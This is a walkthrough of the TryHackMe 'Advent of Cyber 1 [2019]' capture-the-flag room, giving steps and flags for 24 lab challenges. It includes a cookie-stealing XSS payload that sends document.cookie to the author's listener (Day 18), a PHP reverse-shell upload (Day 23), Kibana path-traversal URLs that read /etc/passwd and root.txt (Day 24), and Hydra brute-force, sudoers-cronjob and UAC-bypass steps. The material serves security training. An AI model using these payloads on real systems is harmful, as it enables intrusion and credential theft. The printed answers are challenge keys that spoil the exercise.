Advent of Cyber 1 [2019]
This guide contains the answer and steps necessary to get to them for the Advent of Cyber room.
Table of contents
- [Day 1] Inventory Management
- [Day 2] Arctic Forum
- [Day 3] Evil Elf
- [Day 4] Training
- [Day 5] Ho-Ho-Hosint
- [Day 6] Data Elf-iltration
- [Day 7] Skilling Up
- [Day 8] SUID Shenanigans
- [Day 9] Requests
- [Day 10] Metasploit-a-ho-ho-ho
- [Day 11] Elf Applications
- [Day 12] Elfcryption
- [Day 13] Accumulate
- [Day 14] Unknown Storage
- [Day 15] LFI
- [Day 16] File Confusion
- [Day 17] Hydra-ha-ha-haa
- [Day 18] ELF JS
- [Day 19] Commands
- [Day 20] Cronjob Privilege Escalation
- [Day 21] Reverse Elf-ineering
- [Day 22] If Santa, Then Christmas
- [Day 23] LapLANd (SQL Injection)
- [Day 24] Elf Stalk
[Day 1] Inventory Management
In this task we need to use cookies to account another users account.
- What is the name of the cookie used for authentication?
First we need to create an account on the website to view the cookie we get.
Now we login and open the developer tools to look at the cookie stored in our browser. Here we find its name.
Click for answer
authid
- If you decode the cookie, what is the value of the fixed part of the cookie?
We can decode the cookie using Cyber Chef. It looks like a Base64 encoding and this is exactly what Cyber Chef suggest.
We see the cookie is our username and a random string of characters. Could this be a fixed part for all cookies?
Click for answer
v4er9ll1!ss
- After accessing his account, what did the user mcinventory request?
Lets find out. Adding the username mcinventory in front of the fixed part of the cookie and encoding it through Cyber Chef we get the following cookie:
Change the value of our existing cookie to the value we just created and reload the page. Looks like we are now logged in as mcinventory. On the home page we can see what het requested.
Click for answer
firewall
[Day 2] Arctic Forum
In this task we will be using brute forcing to find hidden webpages.
- What is the path of the hidden page?
We will use DirSearch to find any hidden directories on the server. Using the following command:
Click for answer
/sysadmin
- What is the password you found?
Doing a little bit of OSINT research, we can look at the source of the website. Looks like there is a reference to a developer github page. Searching for Arctic Digital Design we find the following Github page with some default credentials.
Click for answer
defaultpass
- What do you have to take to the 'partay'
Using the default credentials we found, we can login to the sysadmin page. On this page we find what to bring to the party.
Click for answer
Eggnog
[Day 3] Evil Elf
In this task we will investigate a networp capture using Wireshark. The supporting documentation can be found here.
- Whats the destination IP on packet number 998?
Looking at entry 998 we can see its destination ip in the destination column.
Click for answer
63.32.89.195
- What item is on the Christmas list?
After opening the capture file in Wireshark, we can filter on either http or telnet to find any plain-text data. Sure enough, we get three hits for telnet. In the first one, we see a command which writes an item to the christmas list.
Click for answer
ps4
- Crack buddy's password!
In the next entries we see a command to lookup the users in the shadow file. Here we see a hashed password for buddy.
Using hashcat we can crack this password with the following command:
Click for answer
rainbow
[Day 4] Training
In this task we will be learning some more basic commands to use in Linux.
- How many visible files are there in the home directory(excluding ./ and ../)?
To find the files in the home directory we use the following command: ls.
Click for answer
8
- What is the content of file5?
To view the contents of file5 we use the following command:
Click for answer
recipes
- Which file contains the string ‘password’?
To find which file contains a specific string, we can use the following command:
grep -l -e "password" -f *
-l -> Only show matching files
-e -> Regex pattern to use
-f -> Files to look through
Click for answer
file6
- What is the IP address in a file in the home folder?
To find the IP address in one of the files, we use the following command:
cat * | grep -E "([0-9]{1,3}\.){3}[0-9]{1,3}" -o
-E -> Extended Regex pattern to use
-o -> Only show the matching string
Click for answer
10.0.0.05
- How many users can log into the machine?
We can look for any users folders in the home directory.
ls -la /home
-l -> Display in a long listing format
-a -> Also show (hidden) files starting with `.`
Click for answer
3
- What is the sha1 hash of file8?
To find the hash we can use sha1sum with the following command: sha1sum file8.
Click for answer
fa67ee594358d83becdd2cb6c466b25320fd2835
- What is mcsysadmin’s password hash?
This is something we can usually find in the shadow file. Unfortunately, we don't have permission to access it. Maybe there is a backup file laying around somewhere. Lets look for it using:
The 2>/dev/null part make sure we only see entries which are true (for our search).
Click for answer
$6$jbosYsU/$qOYToX/hnKGjT0EscuUIiIqF8GHgokHdy/Rg/DaB.RgkrbeBXPdzpHdMLI6cQJLdFlS4gkBMzilDBYcQvu2ro/
[Day 5] Ho-Ho-Hosint
In this task we will be using OSINT to find more information about our target. The first thing to do, is to reveal any metadata in the provided image.
Looks like the photographer is JLolax1. After searching for her, we find her Twitter profile. Here we can easiliy find the answers to questions 1, 2, and 3.
- What is Lola's date of birth? Format: Month Date, Year(e.g November 12, 2019)
Click for answer
December 29, 1900
- What is Lola's current occupation?
Click for answer
Santa's Helper
- What phone does Lola make?
Click for answer
iPhone X
- What date did Lola first start her photography? Format: dd/mm/yyyy
Here we need to dig a little deeper. Following the link in her bio, we get to her Wordpress website. Nothing is stated about when she started photography. But we can search for some interesting information through the Waybackmachine. Here we can see this not on a previous version.
Click for answer
23/10/2014
- What famous woman does Lola have on her web page?
To find out who is on the image, we can run it through Google image search or TinEye.
Click for answer
ada lovelace
[Day 6] Data Elf-iltration
In this task we are looking at a network capture to identify any information we need.
- What data was exfiltrated via DNS?
Filtering the data on DNS traffic we find multiple entries with the same, seemingly, random string. Lets decode it using CyberChef.
Click for answer
Candy Cane Serial Number 8491
- What did Little Timmy want to be for Christmas?
Looking further in the telnet and http traffic we find a zip archive and an image. We can save these objects to our computer.
To crack the archive, we can use fcrackzip.
fcrackzip -b -D -p /usr/share/wordlists/rockyou.txt christmaslists.zip
-b -> specify bruteforce attack
-D -> specify using a dictionary
-p -> specify dictionary file to use
Now unzip the archive and view Timmy's lists.
Click for answer
PenTester
- What was hidden within the file?
To find any hidden data in the image, we can use steghide.
steghide extract -sf ~/Downloads/TryHackMe.jpg
extract -> specifies extracting hidden data
-sf -> specifies file to extract from
Click for answer
RFC527
[Day 7] Skilling Up
In this task we will be using nmap to perform several scan of the target machine. The first 3 questions can be answered with one command:
nmap -sT -sV -p1-1000 -O 10.10.74.77
-sT -> Perform a TCP scan
-sV -> Look for more info on the services
-p -> Specify port numbers to search for
-O -> Find more info on the host OS
But they can also be performed individually.
- how many TCP ports under 1000 are open?
Click for answer
3
- What is the name of the OS of the host?
Click for answer
Linux
- What version of SSH is running?
Click for answer
7.4
- What is the name of the file that is accessible on the server you found running?
During the Nmap scan we found a webserver running on port 999. Visiting this server in the browser, we find the file.
Click for answer
interesting.file
[Day 8] SUID Shenanigans
In this task we must ssh into the target machine and use SUID exploitation to read the flags we don't have permission for.
Username: holly
Password: tuD@4vt0G*TU
- What port is SSH running on?
Running nmap -sV 10.10.75.216 didn't give us a result. So we have to increase our port search area with:
Click for answer
65534
- Find and run a file as igor. Read the file /home/igor/flag1.txt
First we need to find which binaries run as igor. We can do this with the following command:
We see we can run the find command to view the flag. find /home/igor/flag1/txt -exec cat {} \;.
Click for answer
THM{d3f0708bdd9accda7f937d013eaf2cd8}
- Find another binary file that has the SUID bit set. Using this file, can you become the root user and read the /root/flag2.txt file?
Running the command again but searching for root we find the following:
The system-control binary could be what we look for. To read the flag we can take one of two approaches.
We either read the flag directly through system-control.
Or we can use su to switch to root and read the flag.
Click for answer
THM{8c8211826239d849fa8d6df03749c3a2}
[Day 9] Requests
Machine IP:
10.10.169.100
- What is the value of the flag?
I had issues connecting to the machine (yes my VPN was turned on). There was no response using the script or through the browser. Doing a quick nmap scan did reveal the machine to exist with port 3000. However, it was listed as filtered. This probably means the machine or service is not active anymore. It is a room from 2019 so..
Anyway, by using the supplied documentation I came up with the following script which would have hopefully found the flag.
import requests
path = ''
host = 'http://10.10.169.100:3000/'
values = ''
response = requests.get(host + path)
print(response)
json_respons = response.json()
path = "/" + json_respons["next"]
if path != "/end":
values += json_respons["value"]
print("The flag is " + values)
Since this room is now probably not useable anymore, I think it wouldn't be a problem to post the flag itself to allow others to finish this room.
Click for answer
sCrIPtKiDd
[Day 10] Metasploit-a-ho-ho-ho
In this task we need to find an exploit for the webserver and gain access using Metasploit. We can use this blog post to guide us.
Machine IP:
10.10.154.103
First we run an nmap scan to find out more about our target machine.
We can see there is an Apache Coyote 1.1 service running on port 80 which is of interest to us. From the documentation we find we will be exploiting the struts2 vulnerability.
So open up Metasploit with the msfconsole command and type search struts2 to find any modules we can use.
For this task we will be using the exploit/multi/http/struts2_content_type_ognl module. Type use and the module name to select it.
Next we will fill out the required information for our payload. Type show options to list all the options.
In our example we will set the RHOST, RPORT, and TARGETURI. The LHOST was set correctly. If not, use ifconfig to find your ip address under eth0 or tun0 (deppending other wether or not you are using a VPN. After that is done type run to run the exploit.
In our case the TARGETURI will be /showcase.action as this is the base address for the webserver.
Now we have our session running on the target machine.
- Compromise the web server using Metasploit. What is flag1?
To find the flag we will use the find command. However, we first need to change our meterpreter session to a regular shell by using typing shell into our session.
Click for answer
THM{3ad96bb13ec963a5ca4cb99302b37e12}
- Now you've compromised the web server, get onto the main system. What is Santa's SSH password?
Going through some of the directories, we find a file called ssh-creds.txt. This look interesting. Inside we find some credentials we can use to ssh into the machine.
Click for answer
rudolphrednosedreindeer
- Who is on line 148 of the naughty list?
In terminal window (not meterpreter) we can ssh into the machine and look around for the files. We spot two lists here.
To see who is on line 148 of the naughty list we could just count the lines, but using cat with some extra options will be easier.
The -n argument shows line numbers in the output which we can use to search with grep.
Produces
Click for answer
Melisa Vanhoose
- Who is on line 52 of the nice list?
Same command can be used here.
Produces
Click for answer
Lindsey Gaffney
[Day 11] Elf Applications
In this task we need to access some services on the target machine. See the accompanying documentation for mor help. Machine IP: 10.10.223.45
We first run an nmap scan to find all available services on the target machine by running:
Here we can see we have three services running on their default ports. FTP on port 21, NFS on port 111, and MySQL on port 3306.
- What is the password inside the creds.txt file?
To get the password we need to access the NFS service. First we need to find out which shares are available for us to mount
Now we can mount this share to our system.
Now we can go to the newly mounted directory and read the contents of the file.
The file can also be opened from the folder itself.
Click for answer
securepassword123
- What is the name of the file running on port 21?
The FTP service is active on port 21, so we will see if we can login anonymously.
Success! No lets search for the file and copy it to our machine with the get command.
Click for answer
file.txt
- What is the password after enumerating the database?
Reading the file.txt file we found on the FTP server, we see it contains some credentials for a SQL service. Lets see if they still work.
Now we need to see which database we need by running the show databases command.
After trying several databases we find another one that might be interesting. Lets change to use that one.
Does is contain any interesting tables? It looks like it! Lets enumerate the content of the table.
Click for answer
bestpassword
[Day 12] Elfcryption
In this task we will look at various encryption techniques to decrypt some files we received. The supporting documentation can be found here.
We first unzip the contents of the file using either the unzip tosend.zip command or through the GUI.
- What is the md5 hashsum of the encrypted note1 file?
To read the md5 hash of the note1.txt.gpg file we use the following command:
Click for answer
24cf615e2a4f42718f2ff36b35614f8f
- Where was elf Bob told to meet Alice?
To decrypt the file we need a passphrase. I didn't know what it was so I used to one provided by the hint: 25daysofchristmas. Now we can decrypt it by using typing gpg -d note1.txt.gpg1 and entering the passphrase when prompted.
Click for answer
santa's grotto
- Decrypt note2 and obtain the flag!
To decrypt the message we use the command as specified in the supporting material. Again, we use the passphrase supplied by the hint hello.
Click for answer
THM{ed9ccb6802c5d0f905ea747a310bba23}
[Day 13] Accumulate
In this task we are asked to use our previously gathered knowledge to gain access to a system with only its IP address.
The first thing we do, is run a network scan to find all open ports and their services.
Here we see a server running on port 80. Remember the other service for later.
- A web server is running on the target. What is the hidden directory which the website lives on?
Lets open the browser and navigate to the machine's IP and port 80. Here we indeed find a page for windows server. None of the links on this page will lead us anywhere, as there is no internet connections. Instead we will use a tool we used in day 2 of this challenge dirsearch. With the following command we can enumerate different directories present on the server.
This quickly gives us a directory to use. When navigating to the website, we see this is indeed available!
Click for answer
/retro
- Gain initial access and read the contents of user.txt
We need to find a way into the system and read its contents. First we start looking around for any interesting information on the blog. None of the posts have anything of interest. However, we can also see a comment posted by Wade the author. This seems to hold some private stuff you would not want out in the open. Could it possibly be a password?
After some searching we find a login page for the Wordpress website. We can indeed login using the password we found earlier and username Wade. However, this will again lead us nowhere, as we cannot access the files from here. Remember the other service we found running on port 3389? A quick Google search tells us this is used for RPD connections, how fortunate!
Using Remmina with remmina -c rdp:wade@10.10.85.141:80 to login to the machine we need to supply a password at the prompt.
Here we find a conveniently placed file on our desktop. Sweet!
Click for answer
THM{HACK_PLAYER_ONE}
- [Optional] Elevate privileges and read the content of root.txt
This question was a though one, as there was no possibility for me to find out where to go next without a guide. The hint mentioned we should look for what the user was searching for. So the first thing I did was opening Internet Explorer to find any browser hidtory. This was empty.. Looking at other people's writeups, I saw they also had Chrome installed. I, unfortunately, didn't.
I took the liberty of viewing the users browser history another user posted. Apparently, they were searching for a CVE. Perhaps the system is vulnerable to it.
After another Google search I learned we could exploit the vulnerability to obtain a cmd shell with elevated priveleges through the UAC window.
I this case we can open the .exe file on the desktop to open a UAC prompt and view the certificate.
Clicking on the link for the certificate issuer should spawn a browser instance with elevated priveleges as it originates from the .exe.
Important note! Make sure no browser window is currently open before visiting the link. Otherwise, the link will be opened in the browser instance without priveleges.
In the opened browser window we get a connection error, but we can ignore that. We need to save this page as. Either through the menu or with Ctrl + S.
In the path bar we write: C:\Windows\System32\cmd.exe and press Enter.
A cmd shell should openen with elevated priveleges. Lets check.
Lets find out which admin user we should login to.
Looks like it is called Administrator.
Moving into this directory we can search for the text file using:
Now we can open this file and read the flag!
Click for answer
THM{COIN_OPERATED_EXPLOITATION}
[Day 14] Unknown Storage
In this task we will need to look for leaked information from an improperly configured AWS bucket. The supporting material can be found here.
- What is the name of the file you found?
All we need here is the name of the bucket advent-bucket-one.
We can navigate to advent-bucket-one.s3.amazonaws.com to see if the bucket is publicly accessible. And if so, which file is available.
Click for answer
employee_names.txt
- What is in the file?
To view a certain file, we can either use the AWS CLI (account necessary) or through the browser. In this case it is easier to use the browser.
advent-bucket-one.s3.amazonaws.com/employee_names.txt
Click for answer
mcchef
[Day 15] LFI
In this task, we will use Local File Inclusion in order to find a password to a server. Use the supporting information found here.
Machine IP: 10.10.253.159
- What is Charlie going to book a holiday to?
When we open the ip address in our browser we can see the notes Charlie has been taken.
Click for answer
Hawaii
- Read /etc/shadow and crack Charlies password.
Looking at the source code of the website, we notice this piece of code.
Looks like it is loading in content from other files. It uses the /get-file/ command followed by the patch of the file. Let try reading the /etc/shadow file for some passwords.
Note. This can also be done using Burpsuite's Intercept function.
Here we find a password for the user Charlie. Looks like it is a hashed password. From Hashcats examples page, this looks like a SHA512 hash (1800).
Copy and save the password to a file to be used with Hashcat.
Note! Make sure you copy to entire (and correct) part of the hash. Everything between ':' and ':'. Otherwise the length might not be what is expected by Hashcat.
Using hascat with the following command, we can try to find out what the password was (hashcat didn't work on a VM, so I had to switch to Windows).
Click for answer
password1
- What is flag1.txt?
From our previously done Nmap scan, we see port 22 is open for an SSH connection. Lets try our credentials here.
Now we just need to find and read the flag.
Click for answer
THM{4ea2adf842713ad3ce0c1f05ef12256d}
[Day 16] File Confusion
In this task we are using python to automate several tasks on some zipped files. The suppoting documentation can be found here.
- How many files did you extract(excluding all the .zip files)
The following code was used to unzip all files.
ListofZips = os.listdir("/Files/")
for m in ListofZips:
with zipfile.ZipFile('/Files/' + m , 'r') as zip_files:
zip_files.extractall('/Files/')
Click for answer
50
- How many files contain Version: 1.1 in their metadata?
I could not get the exiftool installed properly and it would not import in my script.
Click for answer
3
- Which file contains the password?
T.b.d.
Click for answer
dL6w.txt
[Day 17] Hydra-ha-ha-haa
In this task we will be using Hydra (can be downloaded here if needed) to brute force a password for someones web application login and SSH login. The supporting material can be found here.
With a quick Nmap scan we can see there are indeed two open ports (22 and 80).
- Use Hydra to bruteforce molly's web password. What is flag 1? (The flag is mistyped, its THM, not TMH)
We first visit the website on the target ip and port 80 (without the port it will still redirect).
After inspecting the page, we see the form uses the POST method and the fields of interest are called username and password.
Using the documentation we can write the following hydra command to try and crack Molly's password.
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.52.128 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"
- -l = username
- -P = password list
- /login = the page to which hydra directs the request
- username & password = the fields to enter data into
With the found password we can now login in to website and find the flag.
Click for answer
THM{2673a7dd116de68e85c48ec0b1f2612e}
- Use Hydra to bruteforce molly's SSH password. What is flag 2?
To crack molly's ssh password we use the following command with Hydra:
- -t = number of threads
Using this password we can login to the machine through ssh with:
Here we can find the flag.
Click for answer
THM{c8eeb0468febbadea859baeb33b2541b}
[Day 18] ELF JS
In this task we will exploit an XXS vulnerability using Javasctipt to get access to the admin cookie. The supporting documentation can be found here.
- What is the admin's authid cookie value?
After registering ourselves on the website, it is time to find out where we can use this XSS vulnerability.
Using the code <script>alert(1)</script> in the form for the message, we observe this is where the vulnerability is at.
This also works for displaying our cookie for this session using: <script>alert(document.cookie);</script>
Using the documentation we see that we can redirect the user to a website controlled by us which contains the cookie data within the request. <script>window.location = ‘attacker-web-site.com/page?param=’ + document.cookie </script>
It also stated we should close any paragraphs. From de developer tool we can indeed see the information of the messages is placed within <p> tags, so we need to close those as well.
Altering the code line we get the following:
</p><script>window.location = "http://10.18.78.136:1337/mine.html?cookie="+ document.cookie;</script><p>
The IP address is our machine and the port is a 'randomly' chosen number. Then we need a fake page and parameter.
No we setting a listener on our machine using netcat to listen to any request made on port 1337.
- -l = specifies using listening mode
- -v = verbose logging
- -p = specifies port number to listen on
Note! This apparently works, as the admin will periodically visit the website, meaning their connection will be forwarded to our machine. This was unclear to me at first.
Note! The code we used here window.location actually redirects the user to our address. This effectivly renders the website useless as it is constantly redirecting traffic. This means we have to input our code correct in one try. Otherwise we have to restart the VM. It is clear this is not the perfect command as it will alert the owners, however, for now this was the best I could find by myself.
Click for answer
2564799a4e6689972f6d9e1c7b406f87065cbf65
[Day 19] Commands
In this task we will explore the possibilities of using system commands through a web application. The supporting material can be found here.
- What are the contents of the user.txt file?
When accessing the website on ip address 3000 we only see some text.
We are told, something intersting was found on the api/cmd/ endpoint. Navigating there we find the following:
Eventhough this doesn't give us anything, we can see from a quick dirsearch, that it does indeed exist. In fact, we see various names that look like commands which we might be able to use.
After testing a few, this does in deed looks to be the case.
Lets try a command to find our text file, since we know what it is called. We use find -name user.txt to get the following:
Now we know where we can find it, we will try reading the file using cat. However, this time cat /home/bestadmin/user.txt didn't work.
So we need to encode the URL ('/' and 'space'). We can do so using CyberChef.
Now we can read the file with the encoded URL.
Click for answer
5W7WkjxBWwhe3RNsWJ3Q
[Day 20] Cronjob Privilege Escalation
In this task we are tasked to hack into Sam's account and elevate our priveleges usin a running cronjob. There is no supporting material for this task, but I used this to help me understand how to exploit cronjobs to elevate our priveleges.
- What port is SSH running on?
First thing to do is an nmap scan to find any open ports and running services te determine on which port ssh is running.
Click for answer
4567
- Crack sam's password and read flag1.txt
If Sam uses an easy password, logging into their account shouldn't be too difficult with Hydra. We can use the following command to have Hydra crack Sam's password.
Now we can ssh into the machine and find the flag.
Click for answer
THM{dec4389bc09669650f3479334532aeab}
- Escalate your privileges by taking advantage of a cronjob running every minute. What is flag2?
Now we need to find out what cronjob is running and which it is executing. For this we can use crontab -l. Unfortunately, nothing is listed here. Neither does cat /etc/crontab. Lets try to use find /home -name *sh to find any scripts.
Looks like a recurring task script to me. From the supplied website we found how to add a user to the list of sudoers. Add this to the script.
Now we just have to wait a minute before we can continue. We can do a quick check to see if it working with sudo -i or sudo -l.
To read the file we just need the following command sudo cat /home/ubuntu/flag2.txt.
Click for answer
THM{b27d33705f97ba2e1f444ec2da5f5f61}
[Day 21] Reverse Elf-ineering
In this task we will take a look at reverse engineering binaries. We will use Radare2 for this. The supporting documentation can be found here.
We will start by opening the file for debugging in Radare2 with the command: r2 -d challenge1. Then we tell the program to analyze the file and search for an entry point named main with aa and afl | grep main.
Now we can look at the assembly code by typing pdf @main.
To answer the questions we can simply look through the code. But I will also do a check to see if we are correct by running the coding and inspecting the registers and memory. This is done by placing a breakpoint before the mov eax line.
Use pdf @main again to check the placement of the breakpoint (displayed as b). And dc to run the program up until the breakpoint.
- What is the value of local_ch when its corresponding movl instruction is called(first if multiple)?
On the third line we see that 1 is placed into the variable var_ch.
To check, we symply type: px @rbp-0xc to view the variable.
Click for answer
1
- What is the value of eax when the imull instruction is called?
On the fourth line the value 8 is placed in var_8h. On line five, eax is set as 1. At the imull instruction, eax is multiplied by var_8h.
To check we type dr to view the registers (rax=eax).
Click for answer
6
- What is the value of local_4h before eax is set to 0?
On the next line var_4h is set as eax.
To check, we type: px @rbp-0x4.
Click for answer
6
[Day 22] If Santa, Then Christmas
In this task we have a similar challenge only with an added if-statement in the code. The supporting documentation can be found here.
Like the previous task, we will open the file for debugging, analyze it, and search for a main entry point.
Next we can look at the code with pdf @main.
- what is the value of local_8h before the end of the main function?
First, var_8h is set to 8 and var_4h is set to 2. Then eax is set as var_8h.
Then if eax (8) is less or equal to var_4h (2): jump to [..]. As this statement is false, it moves on to add 1 to var_8h. Then it jumps to the end.
To check we set a breakpoint before the final instruction: db 0x00400b71. And check its value with: px @rbp-0x8.
Click for answer
9
- what is the value of local_4h before the end of the main function?
From the first question we see var_4h is set as 2 and is never changed before the end.
To check this we type: px @rbp-0x4.
Click for answer
2
[Day 23] LapLANd (SQL Injection)
In this task we are using SQL injection to enumerate databases without logging in. Then we use our found credentials to find more information on the subject. The supporting documentation can be found here.
- Which field is SQL injectable? Use the input name used in the HTML code.
On the login page we can see two fields. Email and password. It could be either one of these. Through sqlmap we found it to be the email field. Remember to use the name as used in the html file.
Click for answer
log_email
- What is Santa Claus' email address?
To get the email address, we will enumerate the databases and find any tables which contain user information. To start I run the following command to exploit the vulnerability and enumerate all the databases.
Note! This can also be done with the wizard sqlmap --wizard. I used that the first time. But you have more granular control over the output doing it yourself.
The social database looks like a good place to start. Lets enumerate it find the following command:
In this database we see a table called users. Lets continue with that one.
The table is dumped to a file which we can open or we can use the result printed in the terminal
Click for answer
bigman@shefesh.com
- What is Santa Claus' plaintext password?
In the previous step we also found santa's hashed password. We need to crack it with Hashcat. From their examples page, the hash looks like an MD5 hash. Using the following command we can find out what the plain-text password is.
Click for answer
saltnpepper
- Santa has a secret! Which station is he meeting Mrs Mistletoe in?
With these credentials we can login to the website. Looking around for any messages we find the following.
Click for answer
Waterloo
- Once you're logged in to LapLANd, there's a way you can gain a shell on the machine! Find a way to do so and read the file in /home/user/
Since this application is based on PHP, we can use the PHP reverse shell found in /usr/share/webshells/.... We substitute the IP address for ours and the port for any port number (10.18.78.136:1337). Save it and upload it to the website. We also need to open a listener on port 1337 using Netcat.
Looks like the .php extension is blocked. Lets change the file type and try again.
This seems to work and we can see an incomming connection.
Now all we need to do, is navigate to the flag and open it.
Click for answer
THM{SHELLS_IN_MY_EGGNOG}
[Day 24] Elf Stalk
In this task we only get some information about the target machine and that we need to find a way to uncover sensitive information.
- Find the password in the database
The first thing I did was a nmap scan to uncover any services running on the machine. nmap -sV 10.10.77.2.
Looks like we have an ElasticSearch service running on 9200 and a Kibana-log on 8000. This might come in handy later. Lets focus on the database first.
From the documentation, we can see they use some sort of GET request, which we may be able to alter.
Using _search, we can see we indeed get a response.
Now that we have seen the structure of the data, we can try to look for a password in one of the messages.
Nice!
Click for answer
9Qs58Ol3AXkMWLxiEyUyyf
- Read the contents of the /root.txt file
Now lets foccus on the Kibana instance. We didn't find anything yet, but a more indepth nmap scan releaved a service running on port 5601.
This can be confirmed from the log file we found earlier.
The version looks to be 6.4.2. Searching for an exploit yielded this result on Github.
Apparently we can use a path traversal exploit to look at the data on the machine. This was confirmed after navigating to the site via Burpsuite. Let try with a file that probably will exist as a proof of concept.
http://10.10.77.2:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../.../../../../etc/passwd
The website seemed to be stuck. Maybe the log file can tell us something?
Here we can in fact see the contents of the passwd file. Lets try with the root.txt file.
http://10.10.77.2:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../.../../../../root.txt
Hidden between the rest of the lines, we can see the contents of the file!
Click for answer
someELKfun